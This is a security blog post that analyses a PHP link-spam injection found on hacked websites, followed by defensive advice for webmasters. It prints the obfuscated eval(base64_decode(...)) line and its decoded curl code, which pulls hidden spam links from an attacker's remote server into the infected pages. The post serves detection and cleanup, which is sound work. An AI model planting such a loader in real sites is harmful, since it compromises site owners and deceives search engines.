msgbartop
Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.
msgbarbottom
Loading site search ...

Spammy Links From Remote Servers

   07 Apr 10   Filed in Website exploits

Hidden spammy links injected into web pages on legitimate websites is quite a widespread type of hacker attacks. These parasites try to suck all the “PageRank juice” out of any website they manage to break into and put their shady web pages high in search results.

There are many ways hackers can inject links. They can insert them as plain HTML (will work on most sites) or as an encrypted PHP code (the files should be processed as PHP). Hackers can even use SQL injection on database-driven sites that don’t properly sanitize user input.

Decoupling code from data

Sometimes hackers decouple code from data and inject only some PHP instructions that load spammy links from a standalone file. This makes the construction more flexible since they can simply change the content of that single file whenever they decide to promote a new set of links – no need to update every infected file on a site.

In this post, I’ll show a even more clever way of decoupling code from data.

This is a line of PHP code that you can find in infected files on some compromised sites:

<?php eval(base64_decode("JGw9Imh0dHA6Ly90b3VycmV2aWV3cy5hc2lhL2xpbmtzMi9saW5rLnBocCI7IGlmIChleHRlbnNpb25fbG9hZGVkKCJjdXJsIikpeyANCiRjaCA9IGN1cmxfaW5pdCgpOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgMzApOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyANCmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICRsKTsgJHIgPSBjdXJsX2V4ZWMoJGNoKTsgY3VybF9jbG9zZSgkY2gpO30NCmVsc2V7JHI9aW1wbG9kZSgiIixmaWxlKCRsKSk7fSBwcmludCBAJHI7DQo=")); ?>

When decoded, it executes the following code:

$l="http://tourreviews .asia/ links2/link.php";
if (extension_loaded("curl")) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $l);
$r = curl_exec($ch);
curl_close($ch); }
else{ $r=implode("",file($l)); }
print @$r;

This is a very simple script that tries to download a link.php file from tourreviews .asia/ links2/ and insert its content into infected files.

So what is so clever about this script?

Flexibility

If hackers decide to change anything in the injected HTML code, all they need to do is change the content of the link.php file on their own server and the change will be immediately visible (well, not actually visible since the links are invisible) on hacked pages on all compromised sites. This is very convenient if you want to experiment with different layouts, numbers of links per page, etc.

For example, a few month ago this link.php file contained 50 links inside the <u style=”display:none;”> … </u> tags that made them invisible. Right now this file contains 195 links enclosed in the <font style=”position: absolute;overflow: hidden;height: 0;width: 0″>…</font> tags that make them invisible. Moreover, every link is a <li> element now.

Hackers also constantly rotate the links. On every load the content of the link.php file slightly changes. This way they probably want to make the spam less suspicious since identical link blocks on multiple sites are more likely to trigger anti-spam filters.

Easy maintenance

Once the sites are hacked and the PHP code is injected into legitimate files there’s no need to break into the compromised websites again every time hackers what to change the set of spammy links. The changes will propagate even to websites where the original security hole is already closed (e.g. changed FTP passwords, updated third-party scripts, etc.)

Running several campaigns is also easy – just change the URL of the links file and you are done.

Small footprint

Since all the spammy links are loaded from a remote location on the fly, the size of the injected PHP code is less than 0.5Kb, so the difference is less obvious than in attacks that directly inject all the links (dozens of Kilobytes) into legitimate files.

Out of reach

Remote location of the links file makes the hack detection more difficult. Webmasters can’t simply scan their servers for the spammy keywords they find injected in their web pages. And the links file can’t be deleted by a site admin who occasionally stumbles across a suspicious file.

Drawbacks

However this approach has its obvious drawbacks too. Once the location of the remote file becomes known:

  1. Search engines can regularly check it and discard (or even penalize) any links found in it. So the whole black-hat SEO campaign may fail.
  2. This remote site can be shut down. And since it’s a single point of failure, hidden spammy links will disappear from all the hacked sites. Again, the black-hat campaign will flop and hackers will need to start from scratch.

To webmasters

I can only guess how hackers break into legitimate websites and inject this particular PHP code into web pages (using stolen FTP credentials or via a hole in some script – hope you can help me to answer this question in comments). Actually it doesn’t matter. You should be ready that thing like this may happen. What you should really do is minimize the damage of such attacks (hidden spammy links can negatively affect you search engine ranking). So your goal is to detect intrusion and restore the site as soon as possible.

  1. Integrity – regularly check that no one tamper with your files on server
  2. Fresh clean backup – regularly make backups and keep some historical versions of backups so that you can easily find a restore a clean version of your site should you detect a problem.

These both points can be covered a revision control system. Most revision control systems will report any changes in existing files and provide you with an ability to roll back to any historical state of the site. Very convenient. Just don’t forget to commit changes when you make them.

While it is not as universal, you can use my Unmask Parasites to check web pages for hidden illicit stuff like spammy invisible links. After all it doesn’t require any setup and you’ll see results instantly.

Have your say

Did you come across similar hacks or maybe even more elaborate black-hat SEO schemes? Let’s unmask them!

Related posts:

Reader's Comments (2)

  1. |

    [...] This post was mentioned on Twitter by Denis and Vladimir Nagy, cedricpernet. cedricpernet said: Nice post -> RT @unmaskparasites: [blog] Spammy Links From Remote Servers http://bit.ly/cWrqgm – your comments are welcome [...]

  2. |

    Pretty good point on revision control systems. We do that using the FIM (file integrity monitoring) module of the open source OSSEC.

    It basically alerts when a file changes (or is added to a directory).

    The problem is with shared hosts, where they can’t easily monitor if a file is changing or not… For that I would recommend sucuri.net (that does FIM remotely on the pages you specify).

    *I am the founder of sucuri, so my opinion is a bit biased.